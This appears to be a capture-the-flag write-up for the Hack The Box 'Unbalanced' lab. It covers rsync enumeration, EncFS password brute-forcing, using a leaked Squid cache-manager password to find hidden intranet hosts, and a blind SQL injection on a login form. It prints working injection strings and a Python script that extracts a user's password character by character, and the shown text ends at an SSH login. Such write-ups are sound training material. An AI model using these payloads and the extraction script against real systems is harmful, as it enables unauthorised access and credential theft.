Welcome back! This writeup focused on the HTB Unbalanced box, lets go really fast because its a long machine, let's jump right in!

sudo nmap -A -T4 10.10.10.200
[sudo] password for in7rud3r: 
Swipe your right index finger across the fingerprint reader
Swipe your finger again
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 11:34 CEST
Nmap scan report for 10.10.10.200
Host is up (0.13s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
|   256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_  256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp  open  rsync      (protocol version 31)
3128/tcp open  http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/8%OT=22%CT=1%CU=43303%PV=Y%DS=2%DC=T%G=Y%TM=5F2E71DF
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N%T
OS:=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   116.19 ms 10.10.14.1
2   116.61 ms 10.10.10.200

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.74 seconds


Three open ports: 22 (ssh), 873 (rsync service) and 3128 (squid proxy).

Searching exploits found interesting things for both. I start trying for squid proxy, but nothing happens so decide to pass to rsync, where something goes out.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.200 - Unbalanced (lin)/attack/rsync$ rsync rsync://10.10.10.200:873
conf_backups    EncFS-encrypted configuration backups
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.200 - Unbalanced (lin)/attack/rsync$ rsync --list-only rsync://10.10.10.200:873
conf_backups    EncFS-encrypted configuration backups
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.200 - Unbalanced (lin)/attack/rsync$ rsync --list-only rsync://10.10.10.200:873/conf_backups
drwxr-xr-x          4,096 2020/04/04 17:05:32 .
-rw-r--r--            288 2020/04/04 17:05:31 ,CBjPJW4EGlcqwZW4nmVqBA6
-rw-r--r--            135 2020/04/04 17:05:31 -FjZ6-6,Fa,tMvlDsuVAO7ek
-rw-r--r--          1,297 2020/04/02 15:06:19 .encfs6.xml
-rw-r--r--            154 2020/04/04 17:05:32 0K72OfkNRRx3-f0Y6eQKwnjn
-rw-r--r--             56 2020/04/04 17:05:32 27FonaNT2gnNc3voXuKWgEFP4sE9mxg0OZ96NB0x4OcLo-
-rw-r--r--            190 2020/04/04 17:05:32 2VyeljxHWrDX37La6FhUGIJS
-rw-r--r--            386 2020/04/04 17:05:31 3E2fC7coj5,XQ8LbNXVX9hNFhsqCjD-g3b-7Pb5VJHx3C1
-rw-r--r--            537 2020/04/04 17:05:31 3cdBkrRF7R5bYe1ZJ0KYy786
[...]
-rw-r--r--            203 2020/04/04 17:05:31 vCsXjR1qQmPO5g3P3kiFyO84
-rw-r--r--            670 2020/04/04 17:05:32 waEzfb8hYE47wHeslfs1MvYdVxqTtQ8XGshJssXMmvOsZLhtJWWRX31cBfhdVygrCV5


Well, it's a sort of encrypted back-up, I don't know rsync, but a simple and fast search on the internet provides me with the minimum information I need to go on.

Rsync Command in Linux with Examples
rsync is a fast and versatile command-line utility for synchronizing files and directories between two locations over a remote shell, or from/to a remote Rsync daemon.

So, I download all the content on my machine, so I can work confortable. Now I have to investigate on the encryption method; searching for "EncFS-encrypted configuration backups"

EncFS - ArchWiki

And how to use it, here is the link.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.200 - Unbalanced (lin)/attack/rsync$ encfs ~/Dropbox/hackthebox/_10.10.10.200\ -\ Unbalanced\ \(lin\)/attack/rsync/conf_backups/ ~/Dropbox/hackthebox/_10.10.10.200\ -\ Unbalanced\ \(lin\)/attack/rsync/conf_origin/
EncFS Password: 
Error decoding volume key, password incorrect


Sure... the secret key... search for "encfs decrypt bruteforce"

bruteforce encfs
bruteforce encfs. GitHub Gist: instantly share code, notes, and snippets.

And after a short work.

in7rud3r@kali:/tmp/encfs_bf$ ./bruteforce-encfs.sh /tmp/encfs_bf/conf_backups/ /tmp/encfs_bf/conf_origin/ /usr/share/wordlists/rockyou.txt 
Error decoding volume key, password incorrect
Error decoding volume key, password incorrect
[...]
Error decoding volume key, password incorrect
Error decoding volume key, password incorrect
Error decoding volume key, password incorrect
Error decoding volume key, password incorrect
Error decoding volume key, password incorrect
Error decoding volume key, password incorrect
Key recovered - the password is:
bubblegum


Good, let's go to check what inside the decrypted folder.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.200 - Unbalanced (lin)/attack/rsync$ ls -la conf_origin/
total 628
drwxr-xr-x 2 in7rud3r in7rud3r   4096 Apr  4 17:05 .
drwxr-xr-x 4 in7rud3r in7rud3r   4096 Aug  8 15:38 ..
-rw-r--r-- 1 in7rud3r in7rud3r    267 Apr  4 17:05 50-localauthority.conf
-rw-r--r-- 1 in7rud3r in7rud3r    455 Apr  4 17:05 50-nullbackend.conf
-rw-r--r-- 1 in7rud3r in7rud3r     48 Apr  4 17:05 51-debian-sudo.conf
-rw-r--r-- 1 in7rud3r in7rud3r    182 Apr  4 17:05 70debconf
-rw-r--r-- 1 in7rud3r in7rud3r   2351 Apr  4 17:05 99-sysctl.conf
-rw-r--r-- 1 in7rud3r in7rud3r   4564 Apr  4 17:05 access.conf
-rw-r--r-- 1 in7rud3r in7rud3r   2981 Apr  4 17:05 adduser.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1456 Apr  4 17:05 bluetooth.conf
-rw-r--r-- 1 in7rud3r in7rud3r   5713 Apr  4 17:05 ca-certificates.conf
-rw-r--r-- 1 in7rud3r in7rud3r    662 Apr  4 17:05 com.ubuntu.SoftwareProperties.conf
-rw-r--r-- 1 in7rud3r in7rud3r    246 Apr  4 17:05 dconf
-rw-r--r-- 1 in7rud3r in7rud3r   2969 Apr  4 17:05 debconf.conf
-rw-r--r-- 1 in7rud3r in7rud3r    230 Apr  4 17:05 debian.conf
-rw-r--r-- 1 in7rud3r in7rud3r    604 Apr  4 17:05 deluser.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1735 Apr  4 17:05 dhclient.conf
-rw-r--r-- 1 in7rud3r in7rud3r    346 Apr  4 17:05 discover-modprobe.conf
-rw-r--r-- 1 in7rud3r in7rud3r    127 Apr  4 17:05 dkms.conf
-rw-r--r-- 1 in7rud3r in7rud3r     21 Apr  4 17:05 dns.conf
-rw-r--r-- 1 in7rud3r in7rud3r    652 Apr  4 17:05 dnsmasq.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1875 Apr  4 17:05 docker.conf
-rw-r--r-- 1 in7rud3r in7rud3r     38 Apr  4 17:05 fakeroot-x86_64-linux-gnu.conf
-rw-r--r-- 1 in7rud3r in7rud3r    906 Apr  4 17:05 framework.conf
-rw-r--r-- 1 in7rud3r in7rud3r    280 Apr  4 17:05 fuse.conf
-rw-r--r-- 1 in7rud3r in7rud3r   2584 Apr  4 17:05 gai.conf
-rw-r--r-- 1 in7rud3r in7rud3r   3635 Apr  4 17:05 group.conf
-rw-r--r-- 1 in7rud3r in7rud3r   5060 Apr  4 17:05 hdparm.conf
-rw-r--r-- 1 in7rud3r in7rud3r      9 Apr  4 17:05 host.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1269 Apr  4 17:05 initramfs.conf
-rw-r--r-- 1 in7rud3r in7rud3r    927 Apr  4 17:05 input.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1042 Apr  4 17:05 journald.conf
-rw-r--r-- 1 in7rud3r in7rud3r    144 Apr  4 17:05 kernel-img.conf
-rw-r--r-- 1 in7rud3r in7rud3r    332 Apr  4 17:05 ldap.conf
-rw-r--r-- 1 in7rud3r in7rud3r     34 Apr  4 17:05 ld.so.conf
-rw-r--r-- 1 in7rud3r in7rud3r    191 Apr  4 17:05 libaudit.conf
-rw-r--r-- 1 in7rud3r in7rud3r     44 Apr  4 17:05 libc.conf
-rw-r--r-- 1 in7rud3r in7rud3r   2161 Apr  4 17:05 limits.conf
-rw-r--r-- 1 in7rud3r in7rud3r    150 Apr  4 17:05 listchanges.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1042 Apr  4 17:05 logind.conf
-rw-r--r-- 1 in7rud3r in7rud3r    435 Apr  4 17:05 logrotate.conf
-rw-r--r-- 1 in7rud3r in7rud3r   4491 Apr  4 17:05 main.conf
-rw-r--r-- 1 in7rud3r in7rud3r    812 Apr  4 17:05 mke2fs.conf
-rw-r--r-- 1 in7rud3r in7rud3r    195 Apr  4 17:05 modules.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1440 Apr  4 17:05 namespace.conf
-rw-r--r-- 1 in7rud3r in7rud3r    120 Apr  4 17:05 network.conf
-rw-r--r-- 1 in7rud3r in7rud3r    529 Apr  4 17:05 networkd.conf
-rw-r--r-- 1 in7rud3r in7rud3r    510 Apr  4 17:05 nsswitch.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1331 Apr  4 17:05 org.freedesktop.PackageKit.conf
-rw-r--r-- 1 in7rud3r in7rud3r    706 Apr  4 17:05 PackageKit.conf
-rw-r--r-- 1 in7rud3r in7rud3r    552 Apr  4 17:05 pam.conf
-rw-r--r-- 1 in7rud3r in7rud3r   2972 Apr  4 17:05 pam_env.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1583 Apr  4 17:05 parser.conf
-rw-r--r-- 1 in7rud3r in7rud3r    324 Apr  4 17:05 protect-links.conf
-rw-r--r-- 1 in7rud3r in7rud3r   3267 Apr  4 17:05 reportbug.conf
-rw-r--r-- 1 in7rud3r in7rud3r     87 Apr  4 17:05 resolv.conf
-rw-r--r-- 1 in7rud3r in7rud3r    649 Apr  4 17:05 resolved.conf
-rw-r--r-- 1 in7rud3r in7rud3r    146 Apr  4 17:05 rsyncd.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1988 Apr  4 17:05 rsyslog.conf
-rw-r--r-- 1 in7rud3r in7rud3r   2041 Apr  4 17:05 semanage.conf
-rw-r--r-- 1 in7rud3r in7rud3r    419 Apr  4 17:05 sepermit.conf
-rw-r--r-- 1 in7rud3r in7rud3r    790 Apr  4 17:05 sleep.conf
-rw-r--r-- 1 in7rud3r in7rud3r 316553 Apr  4 17:05 squid.conf
-rw-r--r-- 1 in7rud3r in7rud3r   2351 Apr  4 17:05 sysctl.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1628 Apr  4 17:05 system.conf
-rw-r--r-- 1 in7rud3r in7rud3r   2179 Apr  4 17:05 time.conf
-rw-r--r-- 1 in7rud3r in7rud3r    677 Apr  4 17:05 timesyncd.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1260 Apr  4 17:05 ucf.conf
-rw-r--r-- 1 in7rud3r in7rud3r    281 Apr  4 17:05 udev.conf
-rw-r--r-- 1 in7rud3r in7rud3r    378 Apr  4 17:05 update-initramfs.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1130 Apr  4 17:05 user.conf
-rw-r--r-- 1 in7rud3r in7rud3r    414 Apr  4 17:05 user-dirs.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1889 Apr  4 17:05 Vendor.conf
-rw-r--r-- 1 in7rud3r in7rud3r   1513 Apr  4 17:05 wpa_supplicant.conf
-rw-r--r-- 1 in7rud3r in7rud3r    100 Apr  4 17:05 x86_64-linux-gnu.conf
-rw-r--r-- 1 in7rud3r in7rud3r    642 Apr  4 17:05 xattr.conf


Wooo, a lot of configuration files, I have to identify the right ones. Inside, huge of empty and commented lines, I extract only what I need and let me concentrate on a single file that I found very interesting: squid.conf.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.200 - Unbalanced (lin)/attack/rsync/conf_origin$ cat squid.conf | grep -v -e ^# | grep -v -e '^$'
acl localnet src 0.0.0.1-0.255.255.255  # RFC 1122 "this" network (LAN)
acl localnet src 10.0.0.0/8             # RFC 1918 local private network (LAN)
acl localnet src 100.64.0.0/10          # RFC 6598 shared address space (CGN)
acl localnet src 169.254.0.0/16         # RFC 3927 link-local (directly plugged) machines
acl localnet src 172.16.0.0/12          # RFC 1918 local private network (LAN)
acl localnet src 192.168.0.0/16         # RFC 1918 local private network (LAN)
acl localnet src fc00::/7               # RFC 4193 local private network range
acl localnet src fe80::/10              # RFC 4291 link-local (directly plugged) machines
acl SSL_ports port 443
acl Safe_ports port 80          # http
acl Safe_ports port 21          # ftp
acl Safe_ports port 443         # https
acl Safe_ports port 70          # gopher
acl Safe_ports port 210         # wais
acl Safe_ports port 1025-65535  # unregistered ports
acl Safe_ports port 280         # http-mgmt
acl Safe_ports port 488         # gss-http
acl Safe_ports port 591         # filemaker
acl Safe_ports port 777         # multiling http
acl CONNECT method CONNECT
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow manager
include /etc/squid/conf.d/*
http_access allow localhost
acl intranet dstdomain -n intranet.unbalanced.htb
acl intranet_net dst -n 172.16.0.0/12
http_access allow intranet
http_access allow intranet_net
http_access deny all
http_port 3128
coredump_dir /var/spool/squid
refresh_pattern ^ftp:           1440    20%     10080
refresh_pattern ^gopher:        1440    0%      1440
refresh_pattern -i (/cgi-bin/|\?) 0     0%      0
refresh_pattern .               0       20%     4320
cachemgr_passwd Thah$Sh1 menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
cachemgr_passwd disable all
cache disable

Ok, small learning on the product I'm dealing with.

Features/CacheManager - Squid Web Proxy Wiki

Interesting, let me try; the first URL provides me nothing (http://unbalanced.htb:3128/squid-internal-mgr/info), the page says that the URL is incorrect (or not managed), the second one (http://unbalanced.htb:3128/squid-internal-mgr/menu) asks me for user credentials.

Ok, now... I search on the configuration file and the specified line it misled me, perhaps due to the fact that, I expected to find a user and a password, but I will explain later.

I understand that, anyway, this is a proxy and probably he is hiding me some address and ports that are not reachable by me. So I try to do some test, calling the proxy based on the IP addresses specified in the config file as "local private network" and the ports that the proxy allows. After some test I see something.

in7rud3r@kali:~$ curl -x http://10.10.10.200:3128 https://127.0.0.1:443
curl: (56) Received HTTP code 403 from proxy after CONNECT
in7rud3r@kali:~$ curl -x http://10.10.10.200:3128 https://127.0.0.1
curl: (56) Received HTTP code 403 from proxy after CONNECT
in7rud3r@kali:~$ curl -x http://10.10.10.200:3128 https://0.0.0.0
curl: (56) Received HTTP code 403 from proxy after CONNECT
in7rud3r@kali:~$ curl -x http://10.10.10.200:3128 https://0.0.0.1
curl: (56) Received HTTP code 403 from proxy after CONNECT
in7rud3r@kali:~$ curl -x http://10.10.10.200:3128 https://0.0.0.4
curl: (56) Received HTTP code 403 from proxy after CONNECT
in7rud3r@kali:~$ curl -x http://10.10.10.200:3128 https://192.68.1.8
curl: (56) Received HTTP code 403 from proxy after CONNECT


The proxy seems to be really tough to give me information, but when I try through the telnet on its port using the intranet.unbalanced.htb URL...

in7rud3r@kali:~/Downloads$ telnet 10.10.10.200 3128
Trying 10.10.10.200...
Connected to 10.10.10.200.
Escape character is '^]'.
GET https://intranet.unbalanced.htb/ HTTP/1.1

HTTP/1.1 503 Service Unavailable
Server: squid/4.6
Mime-Version: 1.0
Date: Sun, 09 Aug 2020 14:40:50 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3474
X-Squid-Error: ERR_CONNECT_FAIL 111
Vary: Accept-Language
Content-Language: en
X-Cache: MISS from unbalanced
X-Cache-Lookup: MISS from unbalanced:3128
Via: 1.1 unbalanced (squid/4.6)
Connection: keep-alive
[...]
<blockquote id="error">
<p><b>Connection to 172.17.0.1 failed.</b></p>
</blockquote>
[...]


...a new IP address go out. But for now, I have no idea about how to use it, so I write it down and pass to exploit it using metasploit-framework.

msf5 auxiliary(scanner/http/squid_pivot_scanning) > options 

Module options (auxiliary/scanner/http/squid_pivot_scanning):

   Name          Current Setting                                              Required  Description
   ----          ---------------                                              --------  -----------
   CANARY_IP     1.2.3.4                                                      yes       The IP to check if the proxy always answers positively; the IP should not respond.
   MANUAL_CHECK  true                                                         yes       Stop the scan if server seems to answer positively to every request
   PORTS         21,80,139,443,445,1433,1521,1723,3389,8080,9100,22,873,3128  yes       Ports to scan; must be TCP
   Proxies                                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RANGE         172.17.0.1                                                   yes       IPs to scan through Squid proxy
   RHOSTS        10.10.10.200                                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         3128                                                         yes       The target port (TCP)
   SSL           false                                                        no        Negotiate SSL/TLS for outgoing connections
   THREADS       1                                                            yes       The number of concurrent threads (max one per host)
   VHOST                                                                      no        HTTP server virtual host

msf5 auxiliary(scanner/http/squid_pivot_scanning) > exploit 

[+] [10.10.10.200] 172.17.0.1 is alive but 21 is CLOSED
[*] [10.10.10.200] 172.17.0.1:22 blocked by ACL
[*] [10.10.10.200] 172.17.0.1:139 blocked by ACL
[+] [10.10.10.200] 172.17.0.1 is alive but 443 is CLOSED
[*] [10.10.10.200] 172.17.0.1:445 blocked by ACL
[*] [10.10.10.200] 172.17.0.1:873 blocked by ACL
[+] [10.10.10.200] 172.17.0.1 is alive but 1433 is CLOSED
[+] [10.10.10.200] 172.17.0.1 is alive but 1521 is CLOSED
[+] [10.10.10.200] 172.17.0.1 is alive but 1723 is CLOSED
[+] [10.10.10.200] 172.17.0.1 is alive but 3389 is CLOSED
[+] [10.10.10.200] 172.17.0.1 is alive but 8080 is CLOSED
[+] [10.10.10.200] 172.17.0.1 is alive but 9100 is CLOSED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Still nothing. I try with ports that I know will be closed, but, I prefer to try.

msf5 auxiliary(scanner/http/squid_pivot_scanning) > set ports 70,210,280,488,591,777
ports => 70,210,280,488,591,777
msf5 auxiliary(scanner/http/squid_pivot_scanning) > exploit

[+] [10.10.10.200] 172.17.0.1 is alive but 70 is CLOSED
[+] [10.10.10.200] 172.17.0.1 is alive but 210 is CLOSED
[+] [10.10.10.200] 172.17.0.1 is alive but 280 is CLOSED
[+] [10.10.10.200] 172.17.0.1 is alive but 488 is CLOSED
[+] [10.10.10.200] 172.17.0.1 is alive but 591 is CLOSED
[+] [10.10.10.200] 172.17.0.1 is alive but 777 is CLOSED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Anyway, I have an IP address, and it will reachable by the proxy, so, use the proxy and navigate (I configured my firefox browser).

Oh, no... nothing also in https, what's wrong now? Nothing... try and try again and finally

Ok, php technology, two fields on a form to logon, my idea is to proceed with sqlmap for possible sql injection, but nothing happens. I try also using some of my injectable strings, but the page seems to be do nothing on the backend. I'm on a Dead-end. Anyway, I understand that there an address available on the network's proxy and from the configuration file, understand also that there's an entire subnet mask to scan, so I write a small script that provides to check if some other machines are available.

#!/bin/sh

for i in $(prips 172.16.0.0/12)
do
        # echo "trying $i"
        #result=$(
        curl -o /dev/null -w "Remote Address: %{url_effective} - RCode: %{response_code} - HCode: %{http_code}\n" --connect-timeout 3 --no-progress-meter -x http://10.10.10.200:3128 http://$i &
        # echo "$i: [$result]"
done

bash ./script.sh


Now, I know we are talking about over a million IP addresses and that you will consider me crazy, but I left my machine all night to work without receiving any results the next day (never mind, I had decided to go to bed, the notebook might as well do something in the meantime)

The day after, I was almost on the verge of giving up when reading again the configuration file, I went back to the command authorizations line and that first command seemed really strange to me. Rereading the documentation I discover that

Specify passwords for cachemgr operations.

	Usage: cachemgr_passwd password action action ...


Ok, but the username? so I try to specify to the authentication for only the password, leaving the username empty and...

Silence please and go on! Well, after had launched all the command I found something interesting that I can use.

http://10.10.10.200:3128/squid-internal-mgr/fqdncache

FQDN Cache Statistics:
FQDNcache Entries In Use: 12
FQDNcache Entries Cached: 12
FQDNcache Requests: 30775
FQDNcache Hits: 0
FQDNcache Negative Hits: 10799
FQDNcache Misses: 19976
FQDN Cache Contents:

Address                                       Flg TTL Cnt Hostnames
127.0.1.1                                       H -001   2 unbalanced.htb unbalanced
::1                                             H -001   3 localhost ip6-localhost ip6-loopback
172.31.179.2                                    H -001   1 intranet-host2.unbalanced.htb
172.31.179.3                                    H -001   1 intranet-host3.unbalanced.htb
10.10.14.48                                    N  024   0
127.0.0.1                                       H -001   1 localhost
10.10.14.107                                   N  -521   0
172.17.0.1                                      H -001   1 intranet.unbalanced.htb
ff02::1                                         H -001   1 ip6-allnodes
ff02::2                                         H -001   1 ip6-allrouters
10.10.14.126                                   N  -216   0
10.10.14.247                                   N  -341   0


Ok, two other addresses (172.31.179.2, 172.31.179.3) that navigating expose the same portal I found before for the employees. I remember to read on the forum someone that said that "only one portal of that works". Unfortunately, also this two seems to return the same result of the original one; NOTHING!

With a little shot of intuition (luck), I think that is strange to provide the IP addresses that finish with 2 and 3 and don't provide the first one (.1 final). So I found another (the fourth) portal for the employees and this time seems to works fine.

Yes, temporarily unavailable, but if you navigate the right URL it works: http://172.31.179.1/intranet.php. I understand that it works because, if you insert some wrong credentials, the portal return the "Invalid credentials." message. To understand if the portal is SQLi vulnerable, I try inserting this string on the login fields on the form:

user: ' or '' = '
password ' or '' = '


The result was an interesting list:

At this point there was a lot of work, considering that, despite my suggestions, sqlmap could not identify the injection, so I had to do everything manually (understand the type of vulnerability and exploit it). Here are some of the tests that have been crucial in understanding the type of injection:

in7rud3r@kali:~/Downloads$ curl -x http://10.10.10.200:3128/ --url http://172.31.179.1/intranet.php -d "Username=a&Password=' or Username = 'rita" | sed -n '65,67p'  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
  <div class="w3-row-padding w3-grayscale"><div class="w3-col m4 w3-margin-bottom"><div class="w3-light-grey"><p class='w3-opacity'>      rita</p><div class="w3-container"><h3>      Rita       Fubelli</h3><p>      rita@unbalanced.htb</p><p>Role:       HR Manager</p></div></div></div></div>
  </div>
100  7067    0  7026  100    41  75548    440 --:--:-- --:--:-- --:--:-- 75989
in7rud3r@kali:~/Downloads$ curl -x http://10.10.10.200:3128/ --url http://172.31.179.1/intranet.php -d "Username=a&Password=' or Role = 'HR Manager" | sed -n '65,67p'  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
  <div class="w3-row-padding w3-grayscale"><div class="w3-col m4 w3-margin-bottom"><div class="w3-light-grey"><p class='w3-opacity'>      rita</p><div class="w3-container"><h3>      Rita       Fubelli</h3><p>      rita@unbalanced.htb</p><p>Role:       HR Manager</p></div></div></div></div>
  </div>
100  7069    0  7026  100    43  80758    494 --:--:-- --:--:-- --:--:-- 81252
in7rud3r@kali:~/Downloads$ curl -x http://10.10.10.200:3128/ --url http://172.31.179.1/intranet.php -d "Username=a&Password=' or Email = 'rita@unbalanced.htb" | sed -n '65,67p'
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  7079    0  7026  100    53  82658    623 --:--:-- --:--:-- --:--:-- 84273

  <div class="w3-row-padding w3-grayscale"><div class="w3-col m4 w3-margin-bottom"><div class="w3-light-grey"><p class='w3-opacity'>      rita</p><div class="w3-container"><h3>      Rita       Fubelli</h3><p>      rita@unbalanced.htb</p><p>Role:       HR Manager</p></div></div></div></div>
  </div>
Well, I try to explain it to you. The query on the backend seems to be something like this:
select <something> from <somewhere> where <condition>
The condition is something like this:
where username = '%s' and password = '%s'
where the value passed to the query are that you specify on the form. Making attention to the second one, the password and ignoring for a while the username, when you pass the string "' or '' = '" the query result to be:
where username = 'a' and password = '' or '' = ''
Considering that the AND condition is processed before the OR (in the absence of parentheses) the first condition (username = 'a' and password = '') will be always false, but the second one ('' = '') will be always true, for every record in the table. Now my intention is to concentrate to bryan account (that is a system administrator, but you can do this for whoever you want), and guess the password step by step selecting portions of the password (my first approach was to return the password from the injection directly, but all my try using union or something else fails); remember that you can do this because a partial match still returns the record. So my intent is to build a query with this condition:
where username = 'a' and password = '' or username = 'bryan' and substring(Password,1,1) = 'b'
To proceed after with two char, three char, etc...

After checks with some other test if my idea is feasible...

in7rud3r@kali:~/Downloads$ curl -x http://10.10.10.200:3128/ --url http://172.31.179.1/intranet.php -d "Username=a&Password=' or substring(Username,1,1) = 'r" | sed -n '65,67p'
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
  <div class="w3-row-padding w3-grayscale"><div class="w3-col m4 w3-margin-bottom"><div class="w3-light-grey"><p class='w3-opacity'>      rita</p><div class="w3-container"><h3>      Rita       Fubelli</h3><p>      rita@unbalanced.htb</p><p>Role:       HR Manager</p></div></div></div></div>
  </div>
100  7079    0  7026  100    53  78066    588 --:--:-- --:--:-- --:--:-- 78655

#### 

in7rud3r@kali:~/Downloads$ curl -x http://10.10.10.200:3128/ --url http://172.31.179.1/intranet.php -d "Username=a&Password=' or substring(Username,1,2) = 'ri" | sed -n '65,67p'
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
  <div class="w3-row-padding w3-grayscale"><div class="w3-col m4 w3-margin-bottom"><div class="w3-light-grey"><p class='w3-opacity'>      rita</p><div class="w3-container"><h3>      Rita       Fubelli</h3><p>      rita@unbalanced.htb</p><p>Role:       HR Manager</p></div></div></div></div>
  </div>
100  7080    0  7026  100    54  82658    635 --:--:-- --:--:-- --:--:-- 84285


...I proceed with the real attack. This is the curl I have to exploit:

curl -x http://10.10.10.200:3128/ --url http://172.31.179.1/intranet.php -d "Username=a&Password=' or Username = 'bryan' and substring(Password,1,1) = 'b" | sed -n '65,67p'


And this is the script I used for (valid char used to generate the password are quite all the common printable character):

import requests

s = requests.Session()
s.proxies = {
  'http': 'http://10.10.10.200:3128'
}

datap = {
  'Username': 'a',
  'Password': ''
}

restart = True
partialPassw = ""
while restart:
  for l in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789|\\!\"$%&/=?+@#-.:,;":
    dpwd = "' or Username = 'bryan' and substring(Password,1,{0}) = '{1}".format(len(partialPassw) + 1, partialPassw + l) 
    datap['Password'] = dpwd
    r = s.post('http://172.31.179.1/intranet.php', data = datap)
    if ('Invalid credentials' in r.text):
      continue
    else:
      partialPassw += l
      print(partialPassw)
      break
  else:
    restart = False


In a short the result was this:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.200 - Unbalanced (lin)/attack/script$ python3 bfscript.py 
i
ir
ire
irea
ireal
ireall
ireally
ireallyl
ireallyl0
ireallyl0v
ireallyl0ve
ireallyl0veb
ireallyl0vebu
ireallyl0vebub
ireallyl0vebubb
ireallyl0vebubbl
ireallyl0vebubble
ireallyl0vebubbleg
ireallyl0vebubblegu
ireallyl0vebubblegum
ireallyl0vebubblegum!
ireallyl0vebubblegum!!
ireallyl0vebubblegum!!!


With this credentials on the portal can't do anything, so I try for a different way directly on the remote machine.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.200 - Unbalanced (lin)/attack/script$ ssh bryan@10.10.10.200
The authenticity of host '10.10.10.200 (10.10.10.200)' can't be established.
ECDSA key fingerprint is SHA256:aiHhPmnhyt434Qvr9CpJRZOmU7m1R1LI29c11na1obY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.200' (ECDSA) to the list of known hosts.
bryan@10.10.10.200's password: 
Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Aug 10 15:29:49 2020 from 10.10.15.120
bryan@unbalanced:~$ ls -la
total 32
